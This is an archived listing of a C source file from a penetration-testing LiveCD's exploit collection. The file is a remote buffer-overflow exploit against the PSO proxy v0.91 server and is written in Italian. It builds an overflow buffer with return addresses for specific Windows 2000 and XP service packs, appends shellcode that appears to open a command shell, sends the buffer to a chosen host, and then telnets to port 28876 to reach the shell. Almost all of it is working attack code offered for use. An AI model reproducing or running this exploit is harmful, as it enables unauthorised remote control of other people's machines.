home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / proxy / psoproxy / PSOproxyExploit.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  4.3 KB  |  142 lines
  1. /*******************************************************
  2. *  PSO v0.91 Remote exploit                            *
  3. *  by NoRpiUs                                          *
  4. *                                                      *
  5. *  web: www.norpius.tk                                 *
  6. *  email: norpius@altervista.org                       *
  7. *                                                      *
  8. *******************************************************/ 
  9.  
  10. #include <stdio.h>
  11. #ifdef WIN32
  12.     #include <winsock.h>
  13.     #include <windows.h>
  14.     #define close closesocket
  15. #else
  16.     #include <sys/socket.h>
  17.     #include <sys/types.h>
  18.     #include <arpa/inet.h>
  19.     #include <netdb.h>
  20. #endif
  21.  
  22. unsigned char shellcode[] = 
  23.  
  24.   "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
  25.   "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
  26.   "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
  27.   "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
  28.   "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
  29.   "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
  30.   "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
  31.   "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
  32.   "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
  33.   "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
  34.   "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
  35.   "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
  36.   "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
  37.   "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
  38.   "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
  39.   "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
  40.   "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
  41.   "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
  42.   "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
  43.   "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
  44.   "\x83\xc4\x5c\x61\xeb\x89\x41\r\n";
  45.  
  46.  
  47. void errore( char *err )
  48. {
  49.     printf("%s",err);
  50.     exit(1);
  51. }
  52.  
  53. void connectz( char *host)
  54. {
  55.     char comando[30000];
  56.     sleep(5000);
  57.     sprintf(comando, "telnet %s 28876", host);
  58.     system(comando);
  59. }
  60.  
  61. void banner(void)
  62. {
  63.     fputs("\n\tPSO Remote exploit\n"
  64.           "\tBy NoRpiUs\n"
  65.           "\tweb: www.norpius.tk\n"
  66.           "\temail: norpius@altervista.org\n\n", stdout);
  67. }
  68.  
  69. void uso( char *progz )
  70. {    
  71.     printf("Uso: <host> <porta> <target>\n\n");
  72.     printf("\tTarget:             \n"
  73.                "\t1 = Win2k ITA SP4   \n"
  74.                "\t2 = WinXP ITA SP0(1)\n"
  75.                "\t3 = WinXP ITA SP0(2)\n");
  76.     exit(1);
  77. }
  78.  
  79. int main( int argc, char *argv[] )
  80. {
  81.     int sock;
  82.     struct hostent *he;
  83.     struct sockaddr_in target;
  84.     unsigned char evilbuff[1530];
  85.     long retaddr1 = 0x796C7DDC;   
  86.         long retaddr2 = 0x77E7FC79; 
  87.         long retaddr3 = 0x77EB1933;    
  88.  
  89. #ifdef WIN32
  90.     WSADATA    wsadata;
  91.     WSAStartup(MAKEWORD(2,0), &wsadata);
  92. #endif
  93.  
  94.     banner();
  95.     if ( argc < 4 ) uso(argv[0]);
  96.  
  97.     if ( (he = gethostbyname(argv[1])) == NULL )
  98.         errore("\t[-] Impossibile risolvere l'host\n");
  99.  
  100.     target.sin_family = AF_INET;
  101.     target.sin_addr   = *(( struct in_addr *) he -> h_addr );
  102.     target.sin_port   = htons(atoi(argv[2]));
  103.  
  104.     fputs("\t[+] Preparazione del buffer...\n", stdout);
  105.  
  106.     memset(evilbuff, 0x41, 1040 );
  107.     
  108.         switch(argv[3][0]) 
  109.         {
  110.                 case '1': memcpy(evilbuff + 1024, (unsigned char *) &retaddr1, 4); break;
  111.                 case '2': memcpy(evilbuff + 1024, (unsigned char *) &retaddr2, 4); break;
  112.                 case '3': memcpy(evilbuff + 1024, (unsigned char *) &retaddr3, 4); break;
  113.                 default : errore("[-] Target sbagliato\n");                       
  114.         }
  115.     
  116.     memcpy(evilbuff + 1040, shellcode, sizeof(shellcode)); 
  117.     
  118.     fputs("\t[+] Connessione...\n", stdout);
  119.  
  120.     if ( (sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP )) < 0 )
  121.         errore("\t[-] Impossibile creare socket\n");
  122.  
  123.     if ( connect(sock, (struct sockaddr *) &target, sizeof(target)) < 0 )
  124.         errore("\t[-] Connessione fallita\n");
  125.  
  126.     if ( send( sock, evilbuff, sizeof(evilbuff), 0) < 0 )
  127.         errore("\t[-] Impossibile spedire il buffer\n");
  128.  
  129.     close(sock);
  130.  
  131.     fputs("\t[+] Buffer spedito!\n", stdout);
  132.     fputs("\t[+] In attesa della connessione...\n\n", stdout);
  133.  
  134.     connectz(argv[1]);
  135.  
  136.     return(0);
  137.  
  138. }
  139.  
  140.     
  141.     
  142.